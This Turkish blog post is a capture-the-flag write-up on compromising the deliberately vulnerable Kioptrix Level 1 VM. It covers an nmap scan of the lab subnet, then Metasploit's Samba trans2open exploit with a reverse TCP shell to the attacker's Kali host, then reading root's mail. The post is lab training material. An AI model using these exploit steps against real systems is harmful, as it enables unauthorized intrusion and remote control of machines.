Kioptrix Level1 Makine Çözümü | Kali2020 & VMware

Erdinç Tandoğan 29 Şub 2020 Write Up / Capture Flag 110 Okundu  1

 

KİOPTRİX LEVEL1 MAKİNE ÇÖZÜMÜ

Herkese merhaba.  Kioptrix Level1 makinesinin çözümünü Kali2020 ve VMware ile ilk defa hep beraber yapacağız.

KİOPTRİX Makinesinin IP Adresini Alamama Sorunu

ÖNEMLİ! : Eğer Kioptrix makinesi VMware ile kullanıyorsanız- Kioptrix makinesinin .vmx uzantılı dosyasını notepad ile açıp “bridged” kelimesini aratın, iki tırnak içerisindeki “bridged” kelimesini “nat” olarak değiştirin. Ondan sonra Kioptrix sanal makinasının network ayarlarından NAT seçeneğine tıklayıp makineyi öyle açınız. Bunları yapmamanız durumunda nmap taramasında KİOPTRİX makinesinin IP adresini alamayabilirsiniz.

SETUP / INSTALL

Kioptrix Level1 İsimli makineyle ilgili bilgilere ve indirme linkine Vulnhub’ın aşağıdaki linkinden ulaşabilirsiniz.

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

KİOPTRİX ZAFİYETLİ MAKİNE NEDİR ?

Kioptrix, içerisinde zafiyetleri istismar edilen, çeşitli erişim yöntemleriyle makineyi ele geçirmeye çalıştığımız bir sanal makine uygulamasıdır. Level1 çözümüne başlıyorum.

  • İfconfig komutu ile Kali 2020 makinemin IP adresini aldım.

Daha sonra bulunduğum network üzerindeki diğer IP adreslerini bulmak için nmap çalıştırıyorum.

  • Nmap –sV –A  192.168.160.0/24 ile bulunduğum networkü ve networkdeki açık portları taradım.

Tarama sonucunda 192.168.160.133 IP adresinin Kioptrix makinesine ait IP adresi olduğunu tespit ettim ve burada bir 139 portunun açık olduğunu ve samba açığı olduğunu tespit ettim.

Port 139 nedir neler yapar ?

Port 139; Netbios-ssn servisi için Netbios-session oluşturma ve iletme işlemlerini gerçekleştirir. Netbios ise OSI referans modelinde Session ve Transport katmanlarında çalışan bir API’dir. Netbios networkte bulunan iki cihaz arasında bir oturum başlatmak, bir oturumu sonlandırmak, verilerin doğru cihaza ulaşmasını kontrol etmek ve bilgisayar adlarının networkte çözümlenmesini sağlamakla görevlidir. Tüm bu işlemler port 139 baz alınarak yapılmaktadır. (Ayrıca bknz. http://www.scribd.com/doc/58525278/54/NetBT-Nedir S:47,48,49) Örneğin bir networkte dosya paylaşımı ve dosyaya erişim kontrolleri Netbios-ssn tarafından gerçekleştirilir. Hal böyle olunca, bir çok virüs ve exploit temel olarak Netbios-ssn (Port 139)’i hedef alır. (Kaynak : http://eyupcelik.com.tr/guvenlik/402-yerel-aglarda-port-139-ve-saldiri-yontemi  )

 

* Msfconsole komutuyla Metasiploite geçtim. Burada çalıştırdığım search samba komutu ile samba açığı ile ilgili exploitleri aramaya başladım. Aynı zamanda burada bizim linux sistemimiz ile ilgili expoliti seçtik ve use exploit/linux/samba/trans2open komutu ile içeriye girdik.

  • Burada reverse_tcp yapıp karşı tarafa reverse shell uygulaması yaptım.

(ÖNEMLİ)

Daha sonra set RHOST 192.168.160.133 ile karşı makinenin IP adresini, set LHOST 192.168.160.129 ile saldırı yapacağım Kali makinemin IP adresini atadım.

run komutu ile saldırıyı başlattık.

pwd ile bulunduğumuz dizini kontrol ettik.

ls dizinimizi listeledik.

cd var ile var’a geçiş yaptık.

Vulnhub sitesinde ipucu olarak verdiği mail kısmını buldum.

cd mail ile mail dosyasına ulaştım.

cat root ile root yetkisiyle giriş yaptık. KİOPTRİX LEVEL1 MAKİNE ÇÖZÜMÜNÜ TAMAMLADIM.

Kioptrix Level2 makinesinin çözümünü ilerleyen günlerde sizlerle paylaşacağım. Güvenli Günler. İyi çalışmalar.

 

Hiç Benzer Yazı Bulunamadı Malesef :(

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir